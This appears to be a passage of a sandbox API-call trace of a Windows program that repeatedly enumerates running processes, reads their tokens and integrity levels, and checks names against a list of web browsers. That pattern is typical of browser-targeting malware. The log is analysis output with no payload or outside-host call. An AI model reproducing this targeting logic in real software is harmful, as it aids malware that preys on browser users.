[0500.619] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0500.619] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0500.619] GetLastError () returned 0x7a [0500.619] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0500.619] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0500.619] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0500.619] CloseHandle (hObject=0x3bc) returned 1 [0500.619] CloseHandle (hObject=0x5a4) returned 1 [0500.619] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0500.619] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0500.619] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0500.619] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0500.619] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0500.619] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0500.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0500.619] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0500.620] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0502.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa338) returned 0xc0000004 [0502.624] VirtualAlloc (lpAddress=0x0, dwSize=0xb338, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0502.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb338, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0502.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0502.627] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0502.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0502.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0502.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0502.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0502.628] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0502.628] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0502.628] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0502.628] GetLastError () returned 0x7a [0502.628] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0502.629] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0502.629] CloseHandle (hObject=0x3bc) returned 1 [0502.629] CloseHandle (hObject=0x5a4) returned 1 [0502.629] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0502.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0502.629] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x377d68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¬") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0502.629] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0502.629] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0502.629] GetLastError () returned 0x7a [0502.630] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0502.630] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0502.630] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0502.630] CloseHandle (hObject=0x3bc) returned 1 [0502.630] CloseHandle (hObject=0x5a4) returned 1 [0502.630] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0502.630] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0502.630] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0502.630] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0502.631] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0502.631] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0502.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0502.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0502.631] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0502.631] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0502.631] GetLastError () returned 0x7a [0502.631] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0502.631] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0502.631] CloseHandle (hObject=0x3bc) returned 1 [0502.632] CloseHandle (hObject=0x5a4) returned 1 [0502.632] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0502.632] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0502.632] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375aa0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">­") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0502.632] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0502.632] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0502.632] GetLastError () returned 0x7a [0502.632] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0502.632] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0502.633] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0502.633] CloseHandle (hObject=0x3bc) returned 1 [0502.633] CloseHandle (hObject=0x5a4) returned 1 [0502.633] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0502.633] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0502.633] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0502.633] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0502.633] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0502.633] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0502.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0502.634] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0502.634] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0502.634] GetLastError () returned 0x7a [0502.634] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0502.634] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0502.634] CloseHandle (hObject=0x3bc) returned 1 [0502.634] CloseHandle (hObject=0x5a4) returned 1 [0502.634] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0502.634] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0502.635] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376260, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">®") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0502.635] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0502.635] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0502.635] GetLastError () returned 0x7a [0502.635] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0502.635] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0502.635] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0502.635] CloseHandle (hObject=0x3bc) returned 1 [0502.635] CloseHandle (hObject=0x5a4) returned 1 [0502.636] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0502.636] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0502.636] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0502.636] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0502.636] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0502.636] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0502.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0502.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0502.636] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0502.636] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0502.636] GetLastError () returned 0x7a [0502.637] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0502.637] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0502.637] CloseHandle (hObject=0x3bc) returned 1 [0502.637] CloseHandle (hObject=0x5a4) returned 1 [0502.637] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0502.637] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0502.637] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3768a8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¯") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0502.637] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0502.637] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0502.638] GetLastError () returned 0x7a [0502.638] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0502.638] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0502.638] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0502.638] CloseHandle (hObject=0x3bc) returned 1 [0502.638] CloseHandle (hObject=0x5a4) returned 1 [0502.638] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0502.638] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0502.638] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0502.639] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0502.639] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0502.639] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0502.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0502.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0502.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0502.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0502.639] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0502.639] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0502.639] GetLastError () returned 0x7a [0502.640] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0502.640] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0502.640] CloseHandle (hObject=0x3bc) returned 1 [0502.640] CloseHandle (hObject=0x5a4) returned 1 [0502.640] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0502.640] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0502.640] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376c50, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">°") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0502.640] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0502.640] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0502.641] GetLastError () returned 0x7a [0502.641] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0502.641] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0502.641] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0502.641] CloseHandle (hObject=0x3bc) returned 1 [0502.641] CloseHandle (hObject=0x5a4) returned 1 [0502.641] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0502.641] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0502.641] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0502.641] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0502.642] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0502.642] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0502.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0502.642] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0502.643] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0504.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa338) returned 0xc0000004 [0504.652] VirtualAlloc (lpAddress=0x0, dwSize=0xb338, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0504.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb338, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0504.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0504.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0504.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0504.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0504.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0504.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0504.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0504.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0504.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0504.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0504.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0504.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0504.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0504.656] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0504.656] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0504.656] GetLastError () returned 0x7a [0504.657] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0504.657] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0504.657] CloseHandle (hObject=0x3bc) returned 1 [0504.657] CloseHandle (hObject=0x5a4) returned 1 [0504.657] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 